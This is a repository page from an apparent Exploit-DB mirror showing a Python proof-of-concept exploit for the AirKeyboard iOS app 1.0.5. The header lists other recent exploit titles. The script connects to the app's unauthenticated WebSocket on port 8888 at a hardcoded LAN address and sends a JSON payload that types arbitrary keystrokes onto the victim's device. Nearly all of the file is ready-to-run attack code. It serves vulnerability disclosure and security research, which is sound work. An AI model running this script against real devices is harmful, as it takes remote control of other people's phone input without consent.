bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/ios/remote/52333.py
Exploit-DB 3cfac1e6a4 DB: 2025-06-16 
15 changes to exploits/shellcodes/ghdb

AirKeyboard iOS App 1.0.5 - Remote Input Injection

Parrot and DJI variants Drone OSes - Kernel Panic Exploit

Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI

Anchor CMS 0.12.7 - Stored Cross Site Scripting (XSS)

Litespeed Cache WordPress Plugin 6.3.0.1 - Privilege Escalation

PHP CGI Module 8.3.4 - Remote Code Execution (RCE)

Microsoft Excel Use After Free - Local Code Execution

PCMan FTP Server 2.0.7 - Buffer Overflow

PCMan FTP Server 2.0.7 - Remote Buffer Overflow

WebDAV Windows 10 - Remote Code Execution (RCE)

Windows 11 SMB Client - Privilege Escalation & Remote Code Execution (RCE)
2025-06-16 00:18:32 +00:00

61 lines
No EOL
1.6 KiB
Python
Executable file
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: AirKeyboard iOS App 1.0.5 - Remote Input Injection
# Date: 2025-06-13
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://airkeyboardapp.com
# Software Link: https://apps.apple.com/us/app/air-keyboard/id6463187929
# Version: Version 1.0.5
# Tested on: iOS 18.5 with AirKeyboard app
'''
Description:
The AirKeyboard iOS application exposes a WebSocket server on port 8888
which accepts arbitrary input injection messages from any client.
No authentication or pairing process is required. This allows any
attacker to type arbitrary keystrokes directly into the victims iOS device
in real-time without user interaction, resulting in full remote input
control.
'''
import websocket
import json
import time
target_ip = "192.168.8.101"
ws_url = f"ws://{target_ip}:8888"
text = "i'm hacker i can write on your keyboard :)"
keystroke_payload = {
"type": 1,
"text": f"{text}",
"mode": 0,
"shiftKey": True,
"selectionStart": 1,
"selectionEnd": 1
}
def send_payload(ws):
print("[+] Sending remote keystroke...")
ws.send(json.dumps(keystroke_payload))
time.sleep(1)
ws.close()
def on_open(ws):
send_payload(ws)
def on_error(ws, error):
print(f"[!] Error: {error}")
def on_close(ws, close_status_code, close_msg):
print("[*] Connection closed")
def exploit():
print(f"[+] Connecting to AirKeyboard WebSocket on {target_ip}:8888")
ws = websocket.WebSocketApp(ws_url,
on_open=on_open,
on_error=on_error,
on_close=on_close)
ws.run_forever()
if __name__ == "__main__":
exploit()
Reference in a new issue View git blame Copy permalink